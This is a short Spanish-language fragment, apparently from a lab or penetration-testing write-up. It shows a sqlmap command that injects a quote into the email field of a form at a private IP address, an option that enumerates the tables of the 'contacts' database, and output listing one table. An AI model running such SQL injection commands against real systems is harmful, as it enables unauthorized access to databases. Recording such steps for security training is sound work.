**Comando base:** `sqlmap -u "http://192.168.0.17/list/" --data="name=ZAP&email=%27zap@zap.com&phone=ZAP&org=ZAP"`

**Opciones adicionales:** `-D contacts --tables`

**Resultado:**
```
Database: contacts
[1 table]
+---------+
| contact |
+---------+
```
